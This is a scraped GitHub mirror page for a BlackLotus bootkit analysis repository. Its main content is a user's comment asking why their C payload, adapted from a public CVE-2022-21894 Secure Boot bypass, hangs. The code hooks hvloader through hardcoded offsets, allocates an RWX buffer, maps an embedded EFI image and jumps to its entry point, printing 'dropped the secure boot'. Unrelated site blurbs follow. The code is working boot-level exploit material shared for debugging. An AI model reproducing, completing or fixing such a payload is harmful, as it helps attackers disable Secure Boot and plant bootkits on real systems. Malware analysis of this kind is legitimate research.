spiralbl0ck / blacklotus-analysis-stage2-bootkit-rootkit-stage Goto Github PK
View Code? Open in Web Editor NEWZ2A-BlackLotus Challenge stage 2 bootkit-rootkit analysis
Z2A-BlackLotus Challenge stage 2 bootkit-rootkit analysis
Hello Mr.,
Please take a look into this code: ref: https://github.com/ASkyeye/CVE-2022-21894-Payload/blob/master/main.c#L43
`#include <windows.h>
#include <winternl.h>
#define EFIAPI __cdecl
#define MEMCPY(Dest, Src, Length) for(UINT64 i = 0; i < (Length); i++) Dest[i] = Src[i];
//Defines taken from https://github.com/btbd/umap/
#define BL_MEMORY_TYPE_APPLICATION (0xE0000012)
#define BL_MEMORY_ATTRIBUTE_RWX (0x424000)
typedef enum E_EXECUTION_CONTEXT
{
ApplicationContext,
FirmwareContext
}EXECUTION_CONTEXT, * PEXECUTION_CONTEXT;
typedef DWORD64 EFI_STATUS;
typedef unsigned short CHAR16;
typedef void(EFIAPI* BLP_ARCH_SWITCH_CONTEXT)(EXECUTION_CONTEXT newContext);
typedef NTSTATUS(EFIAPI* BL_IMG_ALLOCATE_IMAGE_BUFFER)(PVOID* imageBuffer, INT64 imageSize, INT32 memoryType, INT32 attributes, INT32 unused, BOOLEAN flags);
typedef EFI_STATUS(EFIAPI* BOOT_ENTRY)(PVOID imageHandle, PVOID systemTable, BLP_ARCH_SWITCH_CONTEXT fpBlpArchSwitchContext);
typedef EFI_STATUS(EFIAPI* print_entry)(PVOID SystemTable, CHAR16* String, ...);
BYTE efiApp[] = { 0x4D, 0x5A ,......}; // here was my hex code helloworld.efi
DWORD McUpdateEntry(PVOID* functionTableOut, PVOID* functionTableIn)
{
BOOT_ENTRY entry;
BL_IMG_ALLOCATE_IMAGE_BUFFER fpBlImgAllocateImageBuffer;
BLP_ARCH_SWITCH_CONTEXT fpBlpArchSwitchContext;
PIMAGE_DOS_HEADER hvDosHeader, efiDosHeader = (PIMAGE_DOS_HEADER)efiApp;
PIMAGE_NT_HEADERS hvNtHeaders, efiNtHeaders = (PIMAGE_NT_HEADERS)(efiApp + efiDosHeader->e_lfanew);
PIMAGE_SECTION_HEADER secHeader, section;
PBYTE imageBuffer = NULL, src, dest;
PVOID hvLoaderAddr, printProc, hvLoaderBase = NULL, efiSystemTable, efiImageHandle, printSystemTable;
DWORD64 imageSize = efiNtHeaders->OptionalHeader.SizeOfImage;
hvLoaderAddr = functionTableIn[3];
printProc = (PVOID)((DWORD_PTR)hvLoaderAddr + 0xAE48);
printSystemTable = *(PVOID*)((DWORD_PTR)hvLoaderAddr + 0x11093C);
print_entry print = (print_entry)(printProc);
print((*(PVOID*)((DWORD_PTR)printSystemTable + 0x40)), L"dropped the secure boot by MAHA1 :\n");
for (PBYTE searchAddr = printProc; searchAddr; searchAddr--)
{
if (searchAddr[0] == 'M' && searchAddr[1] == 'Z' && searchAddr[2] == 0x90 && searchAddr[4] == 0x03)
{
hvLoaderBase = searchAddr;
break;
}
}
if (!hvLoaderBase)
goto Done;
hvDosHeader = (PIMAGE_DOS_HEADER)hvLoaderBase;
hvNtHeaders = (PIMAGE_NT_HEADERS)((DWORD_PTR)hvLoaderBase + hvDosHeader->e_lfanew);
if (hvNtHeaders->OptionalHeader.CheckSum != 0xEC35E) //It's better to have one check too much than too few
goto Done;
fpBlImgAllocateImageBuffer = (BL_IMG_ALLOCATE_IMAGE_BUFFER)((DWORD_PTR)hvLoaderBase + 0x3CC0C);
fpBlpArchSwitchContext = (PVOID)((DWORD_PTR)hvLoaderBase + 0xC550);
efiImageHandle = *(PVOID*)((DWORD_PTR)hvLoaderBase + 0x113670);
efiSystemTable = *(PVOID*)((DWORD_PTR)hvLoaderBase + 0x1136C8);
//2. Allocate 1:1 PA-VA buffer
if (!NT_SUCCESS(fpBlImgAllocateImageBuffer(&imageBuffer, imageSize, BL_MEMORY_TYPE_APPLICATION, BL_MEMORY_ATTRIBUTE_RWX, 0, 0b00000001)))
goto Done;
if (!imageBuffer)
goto Done;
//3. Copy headers
MEMCPY(imageBuffer, efiApp, efiNtHeaders->OptionalHeader.SizeOfHeaders);
//4. Map sections
secHeader = (PIMAGE_SECTION_HEADER)((UINT64)&efiNtHeaders->OptionalHeader + efiNtHeaders->FileHeader.SizeOfOptionalHeader);
for (WORD i = 0; i < efiNtHeaders->FileHeader.NumberOfSections; i++)
{
section = &secHeader[i];
if (section->SizeOfRawData)
{
dest = (PVOID)(imageBuffer + section->VirtualAddress);
src = (PVOID)(efiApp + section->PointerToRawData);
MEMCPY(dest, src, section->SizeOfRawData);
}
}
//5. Call entry point
if (efiNtHeaders->OptionalHeader.AddressOfEntryPoint)
{
/*
* We use a custom entry point to pass the address of BlpArchSwitchContext to our EFI application.
* Before it can call EFI services, it needs to call BlpArchSwitchContext with 'FirmwareContext' as argument (and revert this before returning).
*/
//fpBlpArchSwitchContext(0);
entry = (BOOT_ENTRY)(imageBuffer + efiNtHeaders->OptionalHeader.AddressOfEntryPoint);
print((*(PVOID*)((DWORD_PTR)printSystemTable + 0x40)), L"dropped the secure boot by MAHA==2 :\n");
//fpBlpArchSwitchContext(1); ///when i tried to call this function fpBlpArchSwitchContext(1) it stuck
entry(efiImageHandle, efiSystemTable, fpBlpArchSwitchContext); // it is exit and not printing any text
}
Done:
while (1);
return 0;
}`
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.